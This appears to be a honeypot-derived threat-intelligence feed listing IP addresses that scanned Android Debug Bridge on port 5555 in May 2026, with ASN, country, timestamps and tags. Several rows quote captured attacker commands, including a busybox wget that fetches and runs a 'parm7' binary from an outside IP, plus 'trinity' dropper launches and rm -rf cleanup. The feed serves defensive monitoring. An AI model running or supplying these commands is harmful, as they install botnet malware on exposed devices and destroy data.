IPv4	142.93.106.19	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-09T08:43:23.000Z \| last_seen=2026-05-09T08:53:35.971Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	65.49.1.10	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-09T08:49:23.000Z \| last_seen=2026-05-15T16:45:27.073Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	65.49.1.15	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-09T08:48:21.000Z \| last_seen=2026-05-09T08:49:22.234Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	47.87.34.234	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=MX; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-09T10:02:50.000Z \| last_seen=2026-05-09T10:03:59.182Z \| ports=5555 \| cc=MX \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	113.160.250.223	Attacker IP • ADB / seen in ADBHoney; events=60; ports=5555; cc=VN; asn=45899; asn_org=VNPT Corp; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=60 \| first_seen=2026-05-09T13:47:20.000Z \| last_seen=2026-05-09T13:59:55.352Z \| ports=5555 \| cc=VN \| asn=45899 \| org=VNPT Corp \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-09
IPv4	184.105.247.195	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-09T14:32:09.000Z \| last_seen=2026-05-09T14:42:15.427Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	184.105.247.223	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-09T14:30:11.000Z \| last_seen=2026-05-09T14:31:13.473Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	45.33.41.118	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-09T15:49:26.000Z \| last_seen=2026-05-09T15:50:27.062Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	66.175.220.105	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-09T15:49:27.000Z \| last_seen=2026-05-09T15:50:34.056Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	94.26.106.29	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=DE; asn=215607; asn_org=dataforest GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=24 \| first_seen=2026-05-09T16:15:32.000Z \| last_seen=2026-05-09T16:25:48.161Z \| ports=5555 \| cc=DE \| asn=215607 \| org=dataforest GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	112.95.208.122	Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=CN; asn=17623; asn_org=China Unicom Shenzen network; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=63 \| first_seen=2026-05-09T17:14:06.000Z \| last_seen=2026-05-09T17:27:21.692Z \| ports=5555 \| cc=CN \| asn=17623 \| org=China Unicom Shenzen network \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-09
IPv4	176.65.139.166	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-09T18:45:06.000Z \| last_seen=2026-05-09T18:46:12.405Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	79.143.186.136	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-09T18:08:13.000Z \| last_seen=2026-05-09T18:09:14.879Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-09
IPv4	167.71.113.42	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-10T00:53:56.000Z \| last_seen=2026-05-10T00:55:02.560Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	123.203.137.76	Attacker IP • ADB / seen in ADBHoney; events=42; ports=5555; cc=HK; asn=9269; asn_org=Hong Kong Broadband Network Ltd.; adb_cmd_hits=17; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-05. events=42 \| first_seen=2026-05-10T01:44:36.000Z \| last_seen=2026-05-10T01:59:44.217Z \| ports=5555 \| cc=HK \| asn=9269 \| org=Hong Kong Broadband Network Ltd. \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437	malware_hosting, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-10
IPv4	185.242.226.59	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=202425; asn_org=IP Volume inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=49 \| first_seen=2026-05-10T01:15:08.000Z \| last_seen=2026-05-25T04:46:48.593Z \| ports=5555 \| cc=US \| asn=202425 \| org=IP Volume inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	220.89.84.49	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-10T01:38:07.000Z \| last_seen=2026-05-10T01:39:12.985Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	45.202.247.123	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=MO; asn=61112; asn_org=AKILE LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=27 \| first_seen=2026-05-10T01:23:14.000Z \| last_seen=2026-05-10T11:04:08.976Z \| ports=5555 \| cc=MO \| asn=61112 \| org=AKILE LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	45.207.34.222	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=MO; asn=61112; asn_org=AKILE LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-10T01:06:37.000Z \| last_seen=2026-05-10T01:07:39.052Z \| ports=5555 \| cc=MO \| asn=61112 \| org=AKILE LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	209.97.180.107	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-10T02:39:39.000Z \| last_seen=2026-05-10T02:50:24.914Z \| ports=5555 \| cc=GB \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	1.28.231.39	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-10T03:43:08.000Z \| last_seen=2026-05-10T03:44:09.637Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	193.163.125.23	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=GB; asn=211298; asn_org=Driftnet Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-10T03:59:21.000Z \| last_seen=2026-05-10T04:00:27.012Z \| ports=5555 \| cc=GB \| asn=211298 \| org=Driftnet Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	216.25.89.122	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-10T03:28:56.000Z \| last_seen=2026-05-10T03:29:58.617Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	65.49.1.52	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-10T03:57:20.000Z \| last_seen=2026-05-25T14:34:44.281Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	65.49.1.59	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-10T03:56:04.000Z \| last_seen=2026-05-10T03:57:09.950Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	114.98.177.172	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-10T04:50:59.000Z \| last_seen=2026-05-10T04:52:00.380Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	114.98.177.177	Attacker IP • ADB / seen in ADBHoney; events=51; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=55 \| first_seen=2026-05-10T04:51:01.000Z \| last_seen=2026-05-10T05:06:51.156Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-10
IPv4	120.242.89.36	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-10T04:03:21.000Z \| last_seen=2026-05-10T04:04:27.912Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	147.182.145.192	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-10T04:37:42.000Z \| last_seen=2026-05-10T04:47:57.525Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	36.20.2.73	Attacker IP • ADB / seen in ADBHoney; events=55; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=55 \| first_seen=2026-05-10T10:23:40.000Z \| last_seen=2026-05-10T10:37:21.647Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-10
IPv4	104.37.185.163	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=19318; asn_org=Interserver, Inc; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-10T11:23:57.000Z \| last_seen=2026-05-10T11:25:01.117Z \| ports=5555 \| cc=US \| asn=19318 \| org=Interserver, Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	103.176.16.219	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=IN; asn=135687; asn_org=Qwistel Network Service Private Limited; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-10T12:17:28.000Z \| last_seen=2026-05-10T12:27:56.256Z \| ports=5555 \| cc=IN \| asn=135687 \| org=Qwistel Network Service Private Limited	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	176.65.139.155	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-10T12:49:57.000Z \| last_seen=2026-05-10T13:00:06.122Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	176.65.139.28	Attacker IP • ADB / seen in ADBHoney; events=30; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://176.65.139.76/bins/parm7; chmod 777 parm7; ./parm7 android" Observed in ADBHoney telemetry for 2026-05. events=30 \| first_seen=2026-05-10T14:00:59.000Z \| last_seen=2026-05-10T14:39:22.927Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	143.42.164.182	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-10T15:50:22.000Z \| last_seen=2026-05-10T15:51:29.468Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	165.154.32.235	Attacker IP • ADB / seen in ADBHoney; events=108; ports=5555; cc=PH; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=108 \| first_seen=2026-05-10T15:20:52.000Z \| last_seen=2026-05-10T15:54:07.718Z \| ports=5555 \| cc=PH \| asn=135377 \| org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	64.62.197.62	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-10T15:01:57.000Z \| last_seen=2026-05-10T15:12:05.622Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	64.62.197.67	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-10T15:01:24.000Z \| last_seen=2026-05-10T15:02:33.399Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	85.11.167.53	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=BG; asn=213438; asn_org=ColocaTel Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=61 \| first_seen=2026-05-10T15:44:56.000Z \| last_seen=2026-05-14T07:15:16.906Z \| ports=5555 \| cc=BG \| asn=213438 \| org=ColocaTel Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	194.127.167.122	Attacker IP • ADB / seen in ADBHoney; events=38; ports=5555; cc=EE; asn=43357; asn_org=Owl Limited; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="rm -f '/data/local/tmp/.sutekh.apk' 2>/dev/null" Observed in ADBHoney telemetry for 2026-05. events=38 \| first_seen=2026-05-10T16:01:51.000Z \| last_seen=2026-05-10T16:10:31.743Z \| ports=5555 \| cc=EE \| asn=43357 \| org=Owl Limited \| related_hashes=0dcf714e673750914e631f21abeb2dc58f034757b1896070fdbe027e4a58e416	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-10
IPv4	176.65.139.90	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=29 \| first_seen=2026-05-10T18:49:41.000Z \| last_seen=2026-05-10T21:52:46.159Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	177.23.128.103	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=AR; asn=269987; asn_org=PABLO MARTIN HEGUIABEHERE DEXTER WIFI; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-10T19:24:35.000Z \| last_seen=2026-05-10T19:25:37.777Z \| ports=5555 \| cc=AR \| asn=269987 \| org=PABLO MARTIN HEGUIABEHERE DEXTER WIFI	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	165.227.126.13	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-10T20:42:19.000Z \| last_seen=2026-05-10T20:43:25.759Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	45.142.193.9	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-10T22:27:50.000Z \| last_seen=2026-05-10T22:28:57.887Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	85.217.149.22	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=CA; asn=209334; asn_org=Modat B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-10T22:12:25.000Z \| last_seen=2026-05-10T22:22:27.737Z \| ports=5555 \| cc=CA \| asn=209334 \| org=Modat B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-10
IPv4	193.46.255.158	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RO; asn=47890; asn_org=Unmanaged Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-10T23:22:38.000Z \| last_seen=2026-05-10T23:23:49.302Z \| ports=5555 \| cc=RO \| asn=47890 \| org=Unmanaged Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	147.185.132.79	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-11T00:01:29.000Z \| last_seen=2026-05-11T00:13:05.368Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	176.65.139.174	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=124 \| first_seen=2026-05-11T00:26:20.000Z \| last_seen=2026-05-26T03:11:37.038Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	91.230.168.170	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=17 \| first_seen=2026-05-11T00:28:28.000Z \| last_seen=2026-05-11T00:38:44.081Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	91.230.168.85	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-11T00:25:19.000Z \| last_seen=2026-05-28T17:07:00.681Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	144.202.60.170	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=20473; asn_org=The Constant Company, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=44 \| first_seen=2026-05-11T01:47:59.000Z \| last_seen=2026-05-11T03:28:09.051Z \| ports=5555 \| cc=US \| asn=20473 \| org=The Constant Company, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	45.198.224.12	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-11T01:28:47.000Z \| last_seen=2026-05-11T14:23:43.947Z \| ports=5555 \| cc=US \| asn=215925 \| org=Vpsvault.host Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	192.253.248.180	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=IR; asn=213790; asn_org=Limited Network LTD; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-11T02:50:37.000Z \| last_seen=2026-05-11T07:59:00.494Z \| ports=5555 \| cc=IR \| asn=213790 \| org=Limited Network LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	45.202.247.95	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=MO; asn=61112; asn_org=AKILE LTD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=188 \| first_seen=2026-05-11T02:21:55.000Z \| last_seen=2026-05-18T06:01:59.945Z \| ports=5555 \| cc=MO \| asn=61112 \| org=AKILE LTD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	64.62.197.48	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-11T03:59:18.000Z \| last_seen=2026-05-11T04:09:29.384Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	64.62.197.53	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-11T03:58:00.000Z \| last_seen=2026-05-11T03:59:09.266Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	157.230.60.209	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-11T04:04:16.000Z \| last_seen=2026-05-11T04:05:23.507Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	8.209.65.98	Attacker IP • ADB / seen in ADBHoney; events=58; ports=5555; cc=DE; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=58 \| first_seen=2026-05-11T06:33:09.000Z \| last_seen=2026-05-11T06:35:26.173Z \| ports=5555 \| cc=DE \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	130.78.217.194	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=GB; asn=204044; asn_org=Packet Star Networks Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-11T12:34:11.000Z \| last_seen=2026-05-11T12:35:16.419Z \| ports=5555 \| cc=GB \| asn=204044 \| org=Packet Star Networks Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
IPv4	185.156.73.181	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=UA; asn=211736; asn_org=FOP Dmytro Nedilskyi; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-11T12:34:24.000Z \| last_seen=2026-05-11T12:35:25.326Z \| ports=5555 \| cc=UA \| asn=211736 \| org=FOP Dmytro Nedilskyi	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-11
